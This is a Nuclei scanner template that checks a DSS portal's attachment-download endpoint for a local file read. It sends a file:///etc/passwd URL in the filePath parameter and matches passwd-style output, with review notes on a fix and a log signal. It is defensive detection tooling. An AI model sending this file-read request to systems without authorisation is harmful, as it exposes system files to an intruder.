nuclei-templates/vulnerabilities/other/dss-download-fileread.yaml

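# Detection template: checks whether the DSS portal attachment-download
# endpoint returns local file content for a file:// URL in `filePath`.
id: dss-download-fileread

info:
  name: DSS Download File Read
  author: ritikchaddha
  severity: high
  description: >-
    Checks whether the DSS portal endpoint attachment_downloadByUrlAtt.action
    returns local file content when its filePath parameter is given a file://
    URL.
  tags: lfi,dss,lfr
  # NOTE(review): no reference or classification is given here; add the vendor
  # advisory or CWE once confirmed so findings can be triaged against a source.
  # NOTE(review): the server-side cause is not visible from this template. A fix
  # presumably limits filePath to the expected attachment store and rejects
  # file:// URLs. Requests to this action whose filePath contains "file:" are a
  # useful access-log signal.

requests:
  - method: GET
    path:
      # The probe reads /etc/passwd only, so it can confirm the issue on
      # Unix-like hosts. No match on another platform is not evidence that the
      # endpoint is safe.
      - "{{BaseURL}}/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd"

    # Up to two redirects are followed, so the matched response may come from
    # the redirect target; check the final URL when triaging a hit.
    redirects: true
    max-redirects: 2

    # Both matchers must hold: passwd-style content AND a 200 status. This
    # keeps error pages that merely echo the requested path from matching.
    matchers-condition: and
    matchers:
      # Matches the root entry of a passwd file ("x" or "*" in the password
      # field, uid 0, gid 0). With no `part` set, the response body is checked.
      - type: regex
        regex:
          - "root:[x*]:0:0:"

      - type: status
        status:
          - 200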